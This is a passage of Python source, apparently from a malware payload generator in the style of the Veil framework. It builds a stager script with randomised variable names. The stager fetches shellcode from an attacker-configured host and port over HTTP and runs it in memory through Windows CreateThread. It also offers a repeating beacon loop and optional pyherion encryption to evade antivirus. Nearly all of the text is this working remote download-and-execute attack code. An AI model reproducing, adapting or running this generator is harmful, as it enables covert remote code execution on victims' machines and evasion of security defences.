inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (
ht_var, ptr_var)
inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var
url_var = helpers.randomString()
shellcode_var = helpers.randomString()
info_var = helpers.randomString()
thread_var = helpers.randomString()
thread_name = helpers.randomString()
thread_name2 = helpers.randomString()
getexec = "def %s(%s):" % (getexec_func, url_var)
getexec += "\n\ttry:"
getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
getexec += "\n\texcept Exception:"
getexec += "\n\t\tpass\n"
url_var = helpers.randomString()
beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
beaconthr += "\n\twhile True:"
beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (
thread_var, thread_name, getexec_func, url_var)
beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
beaconthr += "\n\t\t%s.start()\n" % thread_var
main = "def %s():" % main_func
main += "\n\t%s = 'http://%s:%s/%s'" % (
url_var, self.required_options['DOWNLOAD_HOST'][0],
self.required_options['DOWNLOAD_PORT'][0],
self.required_options['DOWNLOAD_NAME'][0])
main += "\n\tif %s is True:" % retry_var
main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (
thread_var, thread_name, beaconthr_func, url_var)
main += "\n\t\t%s.setDaemon(True)" % thread_var
main += "\n\t\t%s.start()" % thread_var
main += "\n\t%s(%s)" % (getexec_func, url_var)
if self.required_options["BEACON"][0].lower() == 'y':
main += "\n\twhile True:"
main += "\n\t\ttime.sleep(0.1)"
main += "\nif __name__ == '__main__':"
main += "\n\t%s()" % main_func
PayloadCode = imports + global_vars + inject + getexec + beaconthr + main
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
